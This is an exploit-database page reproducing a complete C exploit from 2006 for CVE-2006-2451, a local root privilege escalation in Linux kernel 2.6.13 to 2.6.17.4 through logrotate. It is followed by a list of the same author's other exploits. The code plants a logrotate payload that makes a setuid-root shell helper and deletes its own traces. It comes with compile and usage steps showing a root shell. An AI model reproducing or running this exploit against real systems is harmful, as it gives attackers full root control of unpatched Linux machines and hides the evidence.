Search for hundreds of thousands of exploits

"Linux Kernel 2.6.13 < 2.6.17.4 - 'logrotate prctl()' Local Privilege Escalation"

Author

Exploit author

"Marco Ivaldi"

Platform

Exploit platform

linux

Release date

Exploit published date

2006-07-18

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
/*
 * $Id: raptor_prctl2.c,v 1.3 2006/07/18 13:16:45 raptor Exp $
 *
 * raptor_prctl2.c - Linux 2.6.x suid_dumpable2 (logrotate)
 * Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>
 *
 * The suid_dumpable support in Linux kernel 2.6.13 up to versions before 
 * 2.6.17.4, and 2.6.16 before 2.6.16.24, allows a local user to cause a denial 
 * of service (disk consumption) and POSSIBLY (yeah, sure;) gain privileges via 
 * the PR_SET_DUMPABLE argument of the prctl function and a program that causes 
 * a core dump file to be created in a directory for which the user does not 
 * have permissions (CVE-2006-2451).
 *
 * This exploit uses the logrotate attack vector: of course, you must be able 
 * to chdir() into the /etc/logrotate.d directory in order to exploit the 
 * vulnerability. I've experimented a bit with other attack vectors as well, 
 * with no luck: at (/var/spool/atjobs/) uses file name information to 
 * establish execution time, /etc/cron.hourly|daily|weekly|monthly want +x 
 * permissions, xinetd (/etc/xinetd.d) puked out the crafted garbage-filled 
 * coredump (see also http://www.0xdeadbeef.info/exploits/raptor_prctl.c).
 * 
 * Thanks to Solar Designer for the interesting discussion on attack vectors.
 *
 * NOTE THAT IN ORDER TO WORK THIS EXPLOIT *MUST* BE STATICALLY LINKED!!!
 *
 * Usage:
 * $ gcc raptor_prctl2.c -o raptor_prctl2 -static -Wall
 * [exploit must be statically linked]
 * $ ./raptor_prctl2
 * [please wait until logrotate is run]
 * $ ls -l /tmp/pwned
 * -rwsr-xr-x  1 root users 7221 2006-07-18 13:32 /tmp/pwned
 * $ /tmp/pwned
 * sh-3.00# id
 * uid=0(root) gid=0(root) groups=16(dialout),33(video),100(users)
 * sh-3.00#
 * [don't forget to delete /tmp/pwned!]
 *
 * Vulnerable platforms:
 * Linux from 2.6.13 up to 2.6.17.4 [tested on SuSE Linux 2.6.13-15.8-default]
 */

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <signal.h>
#include <sys/stat.h>
#include <sys/resource.h>
#include <sys/prctl.h>

#define INFO1	"raptor_prctl2.c - Linux 2.6.x suid_dumpable2 (logrotate)"
#define	INFO2	"Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>"

char payload[] = /* commands to be executed by privileged logrotate */
"\n/var/log/core {\n    daily\n    size=0\n    firstaction\n        chown root /tmp/pwned; chmod 4755 /tmp/pwned; rm -f /etc/logrotate.d/core; rm -f /var/log/core*\n    endscript\n}\n";

char pwnage[] = /* build setuid() helper to circumvent bash checks */
"echo \"main(){setuid(0);setgid(0);system(\\\"/bin/sh\\\");}\" > /tmp/pwned.c; gcc /tmp/pwned.c -o /tmp/pwned &>/dev/null; rm -f /tmp/pwned.c";

int main(void)
{
	int 		pid;
	struct rlimit 	corelimit;
	struct stat	st;

	/* print exploit information */
	fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);

	/* prepare the setuid() helper */
	system(pwnage);

	/* set core size to unlimited */
	corelimit.rlim_cur = RLIM_INFINITY;
	corelimit.rlim_max = RLIM_INFINITY;
	setrlimit(RLIMIT_CORE, &corelimit);

	/* let's create a fake logfile in /var/log */
	if (!(pid = fork())) {
		chdir("/var/log");
		prctl(PR_SET_DUMPABLE, 2);
		sleep(666);
		exit(1);
	}
	kill(pid, SIGSEGV);

	/* let's do the PR_SET_DUMPABLE magic */
	if (!(pid = fork())) {
		chdir("/etc/logrotate.d");
		prctl(PR_SET_DUMPABLE, 2);
		sleep(666);
		exit(1);
	}
	kill(pid, SIGSEGV);

	/* did it work? */
	sleep(3);
	if ((stat("/var/log/core", &st) < 0) || 
	    (stat("/etc/logrotate.d/core", &st) < 0)) {
		fprintf(stderr, "Error: Not vulnerable? See comments.\n");
		exit(1);
	}

	/* total pwnage */
	fprintf(stderr, "Please wait until logrotate is run and check /tmp/pwned;)\n");
	exit(0);
}

// milw0rm.com [2006-07-18]
Release DateTitleTypePlatformAuthor
2020-04-21"Oracle Solaris Common Desktop Environment 1.6 - Local Privilege Escalation"localsolaris"Marco Ivaldi"
2020-02-11"OpenSMTPD 6.4.0 < 6.6.1 - Local Privilege Escalation + Remote Code Execution"remotefreebsd"Marco Ivaldi"
2020-01-16"SunOS 5.10 Generic_147148-26 - Local Privilege Escalation"localmultiple"Marco Ivaldi"
2019-10-21"Solaris 11.4 - xscreensaver Privilege Escalation"localsolaris"Marco Ivaldi"
2019-10-16"Solaris xscreensaver 11.4 - Privilege Escalation"localsolaris"Marco Ivaldi"
2019-06-17"Exim 4.87 - 4.91 - Local Privilege Escalation"locallinux"Marco Ivaldi"
2019-05-20"Solaris 7/8/9 (SPARC) - 'dtprintinfo' Local Privilege Escalation (1)"localsolaris"Marco Ivaldi"
2019-05-20"Solaris 7/8/9 (SPARC) - 'dtprintinfo' Local Privilege Escalation (2)"localsolaris"Marco Ivaldi"
2019-05-20"Solaris 10 1/13 (Intel) - 'dtprintinfo' Local Privilege Escalation"localsolaris"Marco Ivaldi"
2019-01-14"xorg-x11-server < 1.20.3 - Local Privilege Escalation (Solaris 11 inittab)"localsolaris"Marco Ivaldi"
2018-11-30"xorg-x11-server < 1.20.3 - 'modulepath' Local Privilege Escalation"localopenbsd"Marco Ivaldi"
2018-10-30"xorg-x11-server 1.20.3 - Privilege Escalation"localopenbsd"Marco Ivaldi"
2009-09-11"IBM AIX 5.6/6.1 - '_LIB_INIT_DBG' Arbitrary File Overwrite via Libc Debug"localaix"Marco Ivaldi"
2008-03-10"Solaris 8/9/10 - 'fifofs I_PEEK' Local Kernel Memory Leak"localsolaris"Marco Ivaldi"
2007-04-04"TrueCrypt 4.3 - 'setuid' Local Privilege Escalation"localwindows"Marco Ivaldi"
2007-02-13"Portable OpenSSH 3.6.1p-PAM/4.1-SuSE - Timing Attack"remotemultiple"Marco Ivaldi"
2007-02-13"Lotus Domino R6 Webmail - Remote Password Hash Dumper"remotewindows"Marco Ivaldi"
2007-02-06"MySQL 4.x/5.0 (Windows) - User-Defined Function Command Execution"remotewindows"Marco Ivaldi"
2006-12-19"Oracle 9i/10g - 'utl_file' FileSystem Access"remotelinux"Marco Ivaldi"
2006-12-19"Oracle 9i/10g - 'extproc' Local/Remote Command Execution"remotemultiple"Marco Ivaldi"
2006-11-23"Oracle 9i/10g - 'read/write/execute' ation Suite"remotemultiple"Marco Ivaldi"
2006-10-24"Solaris 10 libnspr - 'Constructor' Arbitrary File Creation Privilege Escalation (3)"localsolaris"Marco Ivaldi"
2006-10-24"Sun Solaris Netscape Portable Runtime API 4.6.1 - Local Privilege Escalation (2)"localsolaris"Marco Ivaldi"
2006-10-16"Solaris 10 libnspr - 'LD_PRELOAD' Arbitrary File Creation Privilege Escalation (2)"localsolaris"Marco Ivaldi"
2006-10-13"Solaris 10 libnspr - 'LD_PRELOAD' Arbitrary File Creation Privilege Escalation (1)"localsolaris"Marco Ivaldi"
2006-10-13"Sun Solaris Netscape Portable Runtime API 4.6.1 - Local Privilege Escalation (1)"localsolaris"Marco Ivaldi"
2006-09-13"X11R6 < 6.4 XKEYBOARD (Solaris/SPARC) - Local Buffer Overflow (2)"localsolaris"Marco Ivaldi"
2006-08-22"Solaris 10 sysinfo(2) - Local Kernel Memory Disclosure (2)"localsolaris"Marco Ivaldi"
2006-08-22"Solaris 8/9 - '/usr/ucb/ps' Local Information Leak"localsolaris"Marco Ivaldi"
2006-07-18"Linux Kernel 2.6.13 < 2.6.17.4 - 'logrotate prctl()' Local Privilege Escalation"locallinux"Marco Ivaldi"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/2031/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.